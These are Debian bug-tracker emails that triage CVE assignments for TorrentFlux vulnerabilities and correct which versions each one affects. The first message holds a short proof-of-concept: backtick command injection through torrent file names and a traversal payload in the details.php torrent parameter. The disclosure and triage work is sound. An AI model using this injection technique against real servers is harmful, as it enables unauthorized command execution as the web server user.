Bug#400582: CVEs assigned
On 12/6/06, Cameron Dale <[EMAIL PROTECTED]> wrote: > == > Name: CVE-2006-6331 > Status: Candidate > URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331 > Reference: > CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 > Reference: > MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1 > > metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is > false, allows remote attackers to execute arbitrary commands via shell > metacharacters (backticks) in the torrent parameter to details.php. This problem, as described, is not present in 2.2, only in 2.1. Also, the dpatch attached is a a little misleading as it contains changes that fix the 2 previous problems (6329 and 6330) as well as this one (6331). There is, however, a similar problem to this in 2.2 that Stefan described as a "local priviledge escalation". It uses the torrent parameter and a local user's ability to create a file containing backticks, to then execute arbitrary commands as the webserver user (www-data). I don't think it applies to remote users though, only local. You may want to request another CVE for this one, as it is a separate problem from 6331 and does affect version 2.2. Actually, on further investigation, I was wrong about this one, as it is a remote command execution bug in 2.2 as well, and I recommend you report it as such. I had thought that TorrentFlux's cleaning of the downloaded torrent files would make this local only, but I now see that a torrent file that includes files that have backticks will work (sorry Stefan, I misread your previous email about this). Here is how to properly take advantage of this in Torrentflux 2.2 (or 2.1): mkdir -p '`touch /tmp/' echo "Test file" > '`touch /tmp/hello`.torrent' btmakemetafile --target test.torrent http://localhost:6969 \`touch\ / Now upload test.torrent to TorrentFlux and start it downloading (it won't download anything, but that doesn't matter as the files are created when the torrent starts). Now go to (replace username with your TorrentFlux user name): http://hostname/torrentflux/details.php?torrent=../username/`touch /tmp/hello`.torrent It should say only "btshowmetainfo 20030621 - decode BitTorrent metainfo files" and the /tmp/hello file should be created as the web server user (www-data). Cameron -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#400582: CVEs assigned
Hi Micah, Thanks for doing this. Unfortunately, I think one of these reports is a duplicate, and some are inaccurate as they don't apply to version 2.2. I don't know how these work, but if you can update them you may want to make some changes. See my notes below. On 12/6/06, Micah Anderson <[EMAIL PROTECTED]> wrote: == Name: CVE-2006-6328 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 Directory traversal vulnerability in index.php for TorrentFlux 2.2 allows remote attackers to create or overwrite arbitrary files via sequences in the alias_file parameter. This already has an advisory, see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5609 It also doesn't apply to Torrentflux 2.2, only 2.1 (the original advisory from milw0rm was incorrect, but CVE-2006-5609 is correct in indicating only 2.1 is affected). Also, the Debian bug for this one was 395930. == Name: CVE-2006-6329 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 index.php for TorrentFlux 2.2 allows remote attackers to delete files by specifying the target filename in the delfile parameter. Again, this is only present in version 2.1, not 2.2. The Debian bug number for this one is 399169. == Name: CVE-2006-6330 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 index.php for TorrentFlux 2.2 allows remote registered users to execute arbitrary commands via shell metacharacters in the kill parameter. Again, not present in 2.2, only in version 2.1. The Debian bug number for this one is also 399169. == Name: CVE-2006-6331 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 Reference: MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1 metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is false, allows remote attackers to execute arbitrary commands via shell metacharacters (backticks) in the torrent parameter to details.php. This problem, as described, is not present in 2.2, only in 2.1. Also, the dpatch attached is a a little misleading as it contains changes that fix the 2 previous problems (6329 and 6330) as well as this one (6331). There is, however, a similar problem to this in 2.2 that Stefan described as a "local priviledge escalation". It uses the torrent parameter and a local user's ability to create a file containing backticks, to then execute arbitrary commands as the webserver user (www-data). I don't think it applies to remote users though, only local. You may want to request another CVE for this one, as it is a separate problem from 6331 and does affect version 2.2. Cameron -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#400582: CVEs assigned
Hi Cameron and Stefan, Stefan requested that I request CVE IDs for the torrentflux issues from Mitre, which I have done, please see below for these. It would be good to pass these upstream and include them in any changelogs that fix these issues that haven't been uploaded already. micah > New torrentflux issue has come up, reference URL > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 > > Proposed text: > A potential remote command execution has been found in torrentflux, a > php-based torrent management software. Arbitrary code execution in > metaInfo.php allows an authenticated user to execute remote shell > commands on the server when $cfg["enable_file_priority"] is set to 'false'. I've created 4 candidates - 3 for the Secunia advisory published in November, and one for this particular issue. See below. == Name: CVE-2006-6328 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 Directory traversal vulnerability in index.php for TorrentFlux 2.2 allows remote attackers to create or overwrite arbitrary files via sequences in the alias_file parameter. == Name: CVE-2006-6329 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 index.php for TorrentFlux 2.2 allows remote attackers to delete files by specifying the target filename in the delfile parameter. == Name: CVE-2006-6330 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330 Reference: MISC:http://www.milw0rm.com/exploits/2786 Reference: SECUNIA:22880 Reference: URL:http://secunia.com/advisories/22880 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 index.php for TorrentFlux 2.2 allows remote registered users to execute arbitrary commands via shell metacharacters in the kill parameter. == Name: CVE-2006-6331 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582 Reference: MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1 metaInfo.php in TorrentFlux 2.2, when $cfg["enable_file_priority"] is false, allows remote attackers to execute arbitrary commands via shell metacharacters (backticks) in the torrent parameter to details.php. signature.asc Description: OpenPGP digital signature